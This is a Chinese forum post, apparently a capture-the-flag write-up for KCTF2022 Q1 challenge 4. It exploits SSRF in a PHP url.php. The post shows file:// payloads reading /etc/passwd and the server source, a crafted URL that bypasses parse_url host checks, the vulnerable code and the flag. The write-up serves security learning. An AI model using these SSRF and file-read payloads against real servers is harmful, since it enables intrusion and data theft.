首页
社区
课程
招聘
[原创]KCTF2022 Q1 第四题 飞蛾扑火
发表于: 2022-5-16 22:41 8977

[原创]KCTF2022 Q1 第四题 飞蛾扑火

2022-5-16 22:41
8977

考点:ssrf & url bypass

看到phpinfo.phpurl.php

想到ssrf
file协议:http://121.36.145.157:8044/url.php?url=file://127.0.0.1/etc/passwd
能读取到passwd

读取下url.php

主干

需要绕过parse_url和libcurl

构造url:http://121.36.145.157:8044/url.php?url=123.57.254.42://ctf.pediy.com/../flag.php

得到flag:flag{xxx_999()xx*@eeEEE}

<html>
<head>
<meta charset="utf-8">
<title>欢迎挑战 Design by 香草</title>
</head>
<body>
<!--phpinfo.php-->
<img src="url.php?url=https://ctf.pediy.com/upload/team/762/team236762.png">
</body>
</html>
<html>
<head>
<meta charset="utf-8">
<title>欢迎挑战 Design by 香草</title>
</head>
<body>
<!--phpinfo.php-->
<img src="url.php?url=https://ctf.pediy.com/upload/team/762/team236762.png">
</body>
</html>
 
 
curl http://121.36.145.157:8044/url.php?url=file://127.0.0.1/var/www/html/url.php
curl http://121.36.145.157:8044/url.php?url=file://127.0.0.1/var/www/html/url.php
$url=$_GET["url"];
$uu=parse_url($url);
$host=isset($uu["host"])?$uu["host"]:"";
$scheme=isset($uu["scheme"])?$uu["scheme"]:"";
if(empty($host)){
        die("host is null");
}
if(empty($scheme)){
        die("scheme is null");
}
 
//https://ctf.pediy.com/upload/team/762/team236762.png?
if($host=="ctf.pediy.com"||$host=="127.0.0.1"||$host=="localhost"){
//echo curl_request("http://123.57.254.42/flag.php","get",[],true,5);//get flag
  echo curl_request($url,'',"get",[],true,5);
 
}else{
die("host not allow");
}

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

收藏
免费 2
支持
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回
//